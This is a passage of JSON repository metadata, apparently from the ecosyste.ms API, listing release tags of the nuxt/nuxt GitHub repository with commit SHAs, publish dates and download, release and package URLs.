itHub/repositories/nuxt%2Fnuxt/tags/v3.14.159","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.14.159/manifests"},{"name":"v3.14.0","sha":"42420521c7eaf3480191f990e4fb545954f8f551","kind":"commit","published_at":"2024-11-04T15:46:00.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.14.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.14.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.14.0/manifests"},{"name":"v3.13.2","sha":"a50725300f31ca590f0dd4db16db97e3af9a0b18","kind":"commit","published_at":"2024-09-15T21:03:54.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.13.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.13.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.13.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.13.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.13.2/manifests"},{"name":"v3.13.1","sha":"9983e83dae92195e58812e2a106dc9660e0cb559","kind":"commit","published_at":"2024-09-04T09:39:46.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.13.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.13.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.13.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.13.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.13.1/manifests"},{"name":"v3.13.0","sha":"74ef96d096d0045fd00fccd880c1dbbfea51e22a","kind":"commit","published_at":"2024-08-22T16:03:39.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.13.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.13.0/manifests"},{"name":"v3.12.4","sha":"4a1349f700aa6af14253de7363acf243ecad2c02","kind":"commit","published_at":"2024-07-18T22:30:28.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.12.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.12.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.12.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.12.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.12.4/manifests"},{"name":"v3.12.3","sha":"a9fcd82d8eeaf750205838a4e96e9478f18a154f","kind":"commit","published_at":"2024-07-02T15:05:11.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.12.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.12.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.12.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.12.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.12.3/manifests"},{"name":"v2.18.1","sha":"81f5335f26b4f593004a503f2ec7d9a6fd723b64","kind":"tag","published_at":"2024-06-28T11:35:22.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.18.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.18.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.18.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.18.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.18.1/manifests"},{"name":"v2.18.0","sha":"9f5fc19018ae2d6c9afe2ece12d86cba7bbed8f8","kind":"tag","published_at":"2024-06-27T15:41:46.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.18.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.18.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.18.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.18.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.18.0/manifests"},{"name":"v3.12.2","sha":"8578e2bd62bdf3ce9dab70c7241a3953feb043b7","kind":"commit","published_at":"2024-06-16T07:36:40.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.12.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.12.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.12.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.12.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.12.2/manifests"},{"name":"v2.17.4","sha":"5b437353d0ae6972e7a35a47feb8062949daf625","kind":"tag","published_at":"2024-06-14T13:46:43.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.17.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.17.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.17.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.17.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.17.4/manifests"},{"name":"v3.12.1","sha":"41fc45da254408921972ab626101c41cea70de32","kind":"commit","published_at":"2024-06-11T10:50:45.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.12.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.12.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.12.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.12.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.12.1/manifests"},{"name":"v3.12.0","sha":"9f06842fa1b323bd0e0911b0335a091a9052b5c3","kind":"commit","published_at":"2024-06-11T08:44:43.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.12.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.12.0/manifests"},{"name":"@nuxt/ui-templates@1.3.3","sha":"a16107b93bad4fd5a25d48598967e11b59b7baf3","kind":"tag","published_at":"2024-04-05T12:43:20.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/@nuxt/ui-templates@1.3.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/@nuxt/ui-templates@1.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@%40nuxt%2Fui-templates%401.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui-templates@1.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui-templates@1.3.3/manifests"},{"name":"v3.11.2","sha":"3c90aaf8e21955cf0644df2e0b09e3e33441e8e2","kind":"commit","published_at":"2024-04-04T16:04:48.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.11.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.11.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.11.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.11.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.11.2/manifests"},{"name":"@nuxt/ui-templates@1.3.2","sha":"61297118022700364431a76ee0d5fd3ac7b0b61c","kind":"tag","published_at":"2024-04-02T14:38:28.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/@nuxt/ui-templates@1.3.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/@nuxt/ui-templates@1.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@%40nuxt%2Fui-templates%401.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui-templates@1.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui-templates@1.3.2/manifests"},{"name":"@nuxt/ui-assets@0.2.1","sha":"61297118022700364431a76ee0d5fd3ac7b0b61c","kind":"tag","published_at":"2024-04-02T14:38:28.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/@nuxt/ui-assets@0.2.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/@nuxt/ui-assets@0.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@%40nuxt%2Fui-assets%400.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui-assets@0.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui-assets@0.2.1/manifests"},{"name":"v3.11.1","sha":"a80d1a0d6349bf1003666fc79a513c0d7370c931","kind":"commit","published_at":"2024-03-18T21:33:40.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.11.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.11.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.11.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.11.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.11.1/manifests"},{"name":"v3.11.0","sha":"78d5098c28d2e21622961d8b87ef9b4623194fec","kind":"commit","published_at":"2024-03-17T08:15:47.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.11.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.11.0/manifests"},{"name":"v3.10.3","sha":"aaad9924339b4c45d7feb45ed84bac4052edfcf0","kind":"commit","published_at":"2024-02-22T13:56:09.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.10.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.10.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.10.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.10.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.10.3/manifests"},{"name":"v3.10.2","sha":"ceebcde36642fd3711a2567658cb1337a0475153","kind":"commit","published_at":"2024-02-14T13:00:10.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.10.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.10.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.10.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.10.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.10.2/manifests"},{"name":"v3.10.1","sha":"460e0cfebd0ad19c7928c8d986e59f93a1bba1a3","kind":"commit","published_at":"2024-02-05T16:48:47.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.10.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.10.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.10.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.10.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.10.1/manifests"},{"name":"v3.10.0","sha":"da3c502f08587f93e1134bc8e7aea1dee8d628fb","kind":"commit","published_at":"2024-01-30T15:25:00.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.10.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.10.0/manifests"},{"name":"v3.9.3","sha":"fd8b263326c8703815a7e043948c22a8e5b969e2","kind":"commit","published_at":"2024-01-17T14:19:23.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.9.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.9.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.9.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.9.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.9.3/manifests"},{"name":"v3.9.2","sha":"97ed2df423ebd8038f16d81e00cd2836ba2d712a","kind":"commit","published_at":"2024-01-16T17:00:48.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.9.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.9.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.9.2/manifests"},{"name":"v2.17.3","sha":"4aa989d68a1934bd107fc5ad4e87549d39277ecd","kind":"tag","published_at":"2024-01-12T15:13:27.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.17.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.17.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.17.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.17.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.17.3/manifests"},{"name":"v3.9.1","sha":"6736decba0dc8bbc7276848a8a26973440ebdee4","kind":"commit","published_at":"2024-01-05T21:55:58.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.9.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.9.1/manifests"},{"name":"v3.9.0","sha":"c28ef02a1779b1c8a30c3daa2049d3c81a88ac91","kind":"commit","published_at":"2023-12-25T17:24:50.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.9.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.9.0/manifests"},{"name":"v3.8.2","sha":"8d1fc6c4a9b0f6a662a006489162e66fdeb677b1","kind":"commit","published_at":"2023-11-20T22:22:16.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.8.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.8.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.8.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.8.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.8.2/manifests"},{"name":"v3.8.1","sha":"d8674b99820d0e4dd620b20d38efb2ee52c80e52","kind":"commit","published_at":"2023-11-06T11:54:29.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.8.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.8.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.8.1/manifests"},{"name":"v2.17.2","sha":"2080d82471962a5a6ea2c7b38c8975c961e919f8","kind":"tag","published_at":"2023-10-24T03:05:46.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.17.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.17.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.17.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.17.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.17.2/manifests"},{"name":"v3.8.0","sha":"59ff865b133aaf82876f73b2d0566a00081b2795","kind":"commit","published_at":"2023-10-19T15:21:54.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.8.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.8.0/manifests"},{"name":"v3.7.4","sha":"5abd8a231f26a2e08071a59caa87b80eaaa6cd91","kind":"commit","published_at":"2023-09-26T00:18:14.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.7.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.7.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.7.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.7.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.7.4/manifests"},{"name":"v3.7.3","sha":"16e40f899e753208dd270c30869d240fbff0b8a2","kind":"commit","published_at":"2023-09-13T22:52:45.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.7.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.7.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.7.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.7.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.7.3/manifests"},{"name":"v3.7.2","sha":"ebacf199fe52b9dfd5cb48f2f4735df0e9adbaac","kind":"commit","published_at":"2023-09-12T21:35:55.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.7.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.7.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.7.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.7.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.7.2/manifests"},{"name":"v3.7.1","sha":"88a6d0a499cc7696bff94c02548cd9cc60f7820b","kind":"commit","published_at":"2023-09-05T13:49:23.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.7.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.7.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.7.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.7.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.7.1/manifests"},{"name":"v3.7.0","sha":"9013f88e75f499e650463e3c80d116d0ce898a14","kind":"commit","published_at":"2023-08-25T23:26:08.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.7.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.7.0/manifests"},{"name":"@nuxt/ui-templates@1.3.1","sha":"26a0745b9cc3a60aa8bf86c74ab3ff7ec4717058","kind":"tag","published_at":"2023-07-29T03:33:00.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/@nuxt/ui-templates@1.3.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/@nuxt/ui-templates@1.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@%40nuxt%2Fui-templates%401.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui-templates@1.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui-templates@1.3.1/manifests"},{"name":"@nuxt/ui-templates@1.3.0","sha":"039126dac7070eeae2eae16fcb423f6b77a4fc0d","kind":"tag","published_at":"2023-07-28T16:37:48.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/@nuxt/ui-templates@1.3.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/@nuxt/ui-templates@1.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@%40nuxt%2Fui-templates%401.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui-templates@1.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui-templates@1.3.0/manifests"},{"name":"@nuxt/ui-templates@1.2.1","sha":"57e237b03ecb63319727dd407f01be6c6540deab","kind":"tag","published_at":"2023-07-26T09:19:07.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/@nuxt/ui-templates@1.2.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/@nuxt/ui-templates@1.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@%40nuxt%2Fui-templates%401.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui-templates@1.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui-templates@1.2.1/manifests"},{"name":"v3.6.5","sha":"f6a3adb52156774ab372829a2ee2533906758288","kind":"commit","published_at":"2023-07-19T17:40:34.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.6.5","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.6.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.6.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.6.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.6.5/manifests"},{"name":"v3.6.4","sha":"380a91985c350281aba2d8eb16c65b0ebc39ea8b","kind":"commit","published_at":"2023-07-19T15:19:14.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.6.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.6.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.6.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.6.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.6.4/manifests"},{"name":"v3.6.3","sha":"f068ad5edda4aaf79906a58ab472c9c3c0f564f1","kind":"commit","published_at":"2023-07-14T22:48:50.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.6.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.6.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.6.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.6.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.6.3/manifests"},{"name":"v2.17.1","sha":"9de25afa865ca6861a7bb6e3b6b89df56616d93d","kind":"tag","published_at":"2023-07-14T22:35:27.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.17.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.17.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.17.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.17.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.17.1/manifests"},{"name":"v3.6.2","sha":"88f914e9a01cb8ed196afb653dbcb4f7a5123b15","kind":"commit","published_at":"2023-07-05T21:42:25.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.6.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.6.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.6.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.6.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.6.2/manifests"},{"name":"v3.6.1","sha":"54a0d5e8dc2184f995169e6b4c5adaba9cffaa6c","kind":"commit","published_at":"2023-06-26T19:25:37.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.6.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.6.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.6.